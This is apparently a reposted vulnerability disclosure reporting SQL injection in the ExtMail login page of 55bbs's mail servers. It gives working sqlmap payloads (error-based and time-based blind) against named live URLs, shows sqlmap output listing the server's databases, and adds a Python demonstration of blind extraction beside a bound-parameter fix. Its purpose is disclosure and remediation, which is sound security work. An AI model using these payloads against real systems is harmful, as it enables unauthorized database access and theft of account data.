神刀安全网

Vulnerability title: SQL injection in the 55bbs mail system

Vulnerability details

Disclosure status:

2016-03-21: Details reported to the vendor; awaiting the vendor's response
2016-03-26: The vendor has ignored the vulnerability; details are now public

Brief description:

SQL injection in the 55bbs mail system

Detailed description:

The 55bbs mail system runs ExtMail, and its web login handler (index.cgi) is injectable through the POST parameters username and domain. Both error-based and time-based blind injection work, and the back end is MySQL.

Injection URLs:

http://pop3.55bbs.com/extmail/cgi/index.cgi

http://smtp.55bbs.com/extmail/cgi/index.cgi

Injection parameters (sqlmap output):

Parameter: domain (POST)

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause

Payload: username=admin&password=2121&domain=55bbs.com' AND (SELECT 2116 FROM(SELECT COUNT(*),CONCAT(0x7162716a71,(SELECT (ELT(2116=2116,1))),0x71787a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'mtIe'='mtIe&nosameip=on

Parameter: username (POST)

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause

Payload: username=admin' AND (SELECT 8134 FROM(SELECT COUNT(*),CONCAT(0x7162716a71,(SELECT (ELT(8134=8134,1))),0x71787a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'tHuA'='tHuA&password=2121&domain=55bbs.com&nosameip=on

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: username=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))XEQZ) AND 'DGqG'='DGqG&password=2121&domain=55bbs.com&nosameip=on

Proof of vulnerability:

Parameter: domain (POST)

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause

Payload: username=admin&password=2121&domain=55bbs.com' AND (SELECT 3084 FROM(SELECT COUNT(*),CONCAT(0x7170767671,(SELECT (ELT(3084=3084,1))),0x716b627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'EkhN'='EkhN&nosameip=on

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: username=admin&password=2121&domain=55bbs.com' AND (SELECT * FROM (SELECT(SLEEP(5)))LJhz) AND 'Vcus'='Vcus&nosameip=on

Parameter: username (POST)

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause

Payload: username=admin' AND (SELECT 7724 FROM(SELECT COUNT(*),CONCAT(0x7170767671,(SELECT (ELT(7724=7724,1))),0x716b627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'AqVK'='AqVK&password=2121&domain=55bbs.com&nosameip=on

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: username=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))gwoO) AND 'eZmf'='eZmf&password=2121&domain=55bbs.com&nosameip=on

there were multiple injection points, please select the one to use for following injections:

[0] place: POST, parameter: domain, type: Single quoted string (default)

[1] place: POST, parameter: username, type: Single quoted string

[q] Quit

> 0

[17:03:12] [INFO] the back-end DBMS is MySQL

web application technology: Nginx

back-end DBMS: MySQL 5.0

[17:03:12] [INFO] fetching database names

[17:03:12] [INFO] the SQL query used returns 3 entries

[17:03:12] [INFO] resumed: information_schema

[17:03:12] [INFO] resumed: extmail

[17:03:12] [INFO] resumed: test

available databases [3]:

[*] extmail

[*] information_schema

[*] test


Fix recommendation:

Filter the parameters! Concretely: stop interpolating username and domain into the SQL string and pass them as bound parameters (DBI placeholders, since ExtMail is written in Perl), and additionally reject any value that is not a plausible mailbox local part or domain name before it reaches the query.
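How the two payload families above work, and what "parameter filtering" has to mean in practice, as an added Python example that is not part of the original report and not ExtMail's own code. The error-based payloads use a MySQL quirk: in SELECT COUNT(*),CONCAT(marker,(subquery),marker,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x, RAND(0) is a fixed sequence and the group key is recomputed while grouping, so MySQL aborts with "Duplicate entry '...' for key 'group_key'" and the subquery's output (here ELT(2116=2116,1), i.e. the digit 1 when the condition holds) is printed between the 0x7162716a71/0x71787a6b71 markers in the error text. The time-based payloads instead make the server SLEEP(5) only when the injected condition is true. Both rely on the same underlying defect: the value of domain (or username) is pasted into a single-quoted SQL string, which the payload closes with ' and re-balances with AND 'mtIe'='mtIe. The example assumes that query shape (the real index.cgi query is not on the page), uses an in-memory SQLite table with constructed rows in place of the extmail database, and shows the boolean form of the same attack pulling a stored value out character by character through the vulnerable lookup, while the bound-parameter version of the lookup returns nothing. The table name, column names and sample accounts are all invented for the example.

```python
import sqlite3
import string

# Constructed sample rows standing in for ExtMail's mailbox table; the
# values are invented and have nothing to do with real 55bbs accounts.
SAMPLE_ROWS = [
    ("admin", "s3cret", "55bbs.com"),
    ("bob", "hunter2", "55bbs.com"),
]


def new_db():
    """In-memory SQLite database seeded with the constructed rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE mailbox (username TEXT, password TEXT, domain TEXT)")
    con.executemany("INSERT INTO mailbox VALUES (?, ?, ?)", SAMPLE_ROWS)
    return con


def fetch_password_vulnerable(con, username, domain):
    """Assumed shape of the vulnerable lookup: request values are pasted
    into a single-quoted SQL string, which is exactly what the page's
    payloads need (close the quote, inject, re-open the quote)."""
    sql = ("SELECT password FROM mailbox WHERE username='%s' AND domain='%s'"
           % (username, domain))
    return [row[0] for row in con.execute(sql)]


def fetch_password_fixed(con, username, domain):
    """Same lookup with bound parameters: the driver ships the values apart
    from the SQL text, so a quote in the input never reaches the parser."""
    sql = "SELECT password FROM mailbox WHERE username=? AND domain=?"
    return [row[0] for row in con.execute(sql, (username, domain))]


def inject(value, condition, tail="mtIe"):
    """Build a payload with the same skeleton as sqlmap's on the page:
    <value>' AND (<condition>) AND 'mtIe'='mtIe
    The trailing 'mtIe'='mtIe absorbs the application's own closing quote."""
    return "%s' AND (%s) AND '%s'='%s" % (value, condition, tail, tail)


def blind_extract(con, lookup, subquery,
                  charset=string.ascii_lowercase + string.digits, max_len=16):
    """Recover the result of `subquery` through a yes/no oracle only: one
    query per candidate character, which is how boolean- and time-based
    blind injection reads data (a SLEEP(5) delay would replace the row
    check as the oracle)."""
    found = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            condition = "SUBSTR((%s),%d,1)='%s'" % (subquery, pos, ch)
            if lookup(con, "admin", inject("55bbs.com", condition)):
                found += ch
                break
        else:
            break  # no candidate matched: end of the value
    return found


if __name__ == "__main__":
    con = new_db()
    secret = "SELECT password FROM mailbox WHERE username='admin'"
    print("legit:    ", fetch_password_vulnerable(con, "admin", "55bbs.com"))
    print("injected: ", fetch_password_vulnerable(con, "admin", inject("55bbs.com", "1=1")))
    print("extracted:", blind_extract(con, fetch_password_vulnerable, secret))
    print("fixed:    ", blind_extract(con, fetch_password_fixed, secret))
```

blind_extract is the manual equivalent of the "fetching database names" step in the sqlmap session above, done with a true/false oracle instead of an error message; against the fixed lookup every probe is false and nothing comes back, which is the behaviour a retest of index.cgi should show after the fix.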

Copyright notice: when reposting, please credit the source: 路人甲@乌云
